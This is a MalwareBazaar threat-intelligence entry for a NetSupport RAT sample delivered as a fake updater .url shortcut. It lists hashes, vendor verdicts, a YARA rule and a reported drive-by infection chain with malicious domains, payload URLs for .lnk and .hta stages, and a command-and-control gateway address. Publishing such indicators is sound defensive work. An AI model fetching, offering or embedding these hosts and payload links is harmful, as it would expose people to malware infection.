MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 6b11ce7c0306afb09c81991aa88969f585e0a53bb6249346395c55970b85ae31. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


NetSupport


Vendor detections: 3


Intelligence 3 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 6b11ce7c0306afb09c81991aa88969f585e0a53bb6249346395c55970b85ae31
SHA3-384 hash: f8f82375a2032880c0581967818a91e3761471357c1b0ac675329586cc482821ade505d4ef15e2521577302b05798b80
SHA1 hash: 2e1945b198efa5a48fbe451e33a350e726e01cf5
MD5 hash: 3910fd66e7a8df6b635662838092c2bd
humanhash: spring-cat-romeo-queen
File name:Install%20Updater%20(V105.215.8412_silent).url
Download: download sample
Signature NetSupport
Create hunting rule
File size:152 bytes
First seen:2023-07-24 17:40:18 UTC
Last seen:Never
File type:
MIME type:text/plain
ssdeep 3:HRAbABGQYmqSsbIHtzKEgDgFFHvUo1YSo/QJ5FLvyYesbBSn:HRYFVmqSsbw1fSgnPISoIJ5FLvyYesbw
TLSH T116C08C60863EC0BC89A3162CC80A8C6DEA825042227AD9B143E12A8AF8530A54F8CDA5
TrID 91.6% (.URL) Windows URL shortcut (11000/1/2)
8.3% (.INI) Generic INI configuration (1000/1)
Reporter rmceoin
Tags:FakeSG NetSupport url


Avatar
rmceoin
Infection chain
compromised site
-->
google-analytiks.com/sBY76j
-->
esteticalocarno.com/wp-content/uploads/2023/02/Install%20Updater%20(V105.215.8412_silent).url
-->
http://185.252.179.64:80/Downloads/shdeulerinstall.lnk
-->
www.esteticalocarno.com/wp-content/uploads/2018/04/HHYGASDBBBX.hta
-->
NetSupport GatewayAddress conluase62.com:5051

Intelligence

File Origin
# of uploads :
1
# of downloads :
113
Origin country :
US US
Vendor Threat Intelligence
Gathering data
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/6b11ce7c0306afb09c81991aa88969f585e0a53bb6249346395c55970b85ae31
Result
Verdict:
MALICIOUS
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/6b11ce7c0306afb09c81991aa88969f585e0a53bb6249346395c55970b85ae31/
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=nmi447ada2x3bhebtenkrclj6wc6bjj3wysjgrrzlrkzoc4fvyyq._file
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/6b11ce7c0306afb09c81991aa88969f585e0a53bb6249346395c55970b85ae31

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Methodology_Contains_Shortcut_OtherURIhandlers
Create hunting rule
Author:@itsreallynick (Nick Carr)
Description:Detects possible shortcut usage for .URL persistence
Reference:https://twitter.com/cglyer/status/1176184798248919044

File information

The table below shows additional information about this malware sample such as delivery method and external references.

NetSupport

6b11ce7c0306afb09c81991aa88969f585e0a53bb6249346395c55970b85ae31

(this sample)

NetSupport

HTML Application (hta) hta 069ac184f80baa3ced862d6704254d57990699bda965a9bcc2a89b2d8b61c123

NetSupport

Shortcut (lnk) lnk 84172e09798be8252fb18887e9cd29e47279df9641ab50185a6eea50f4c02fef

  
Link
https://infosec.exchange/@rmceoin/110769270597487875
  
Dropping
SHA256 84172e09798be8252fb18887e9cd29e47279df9641ab50185a6eea50f4c02fef
  
Delivery method
Distributed via drive-by

Comments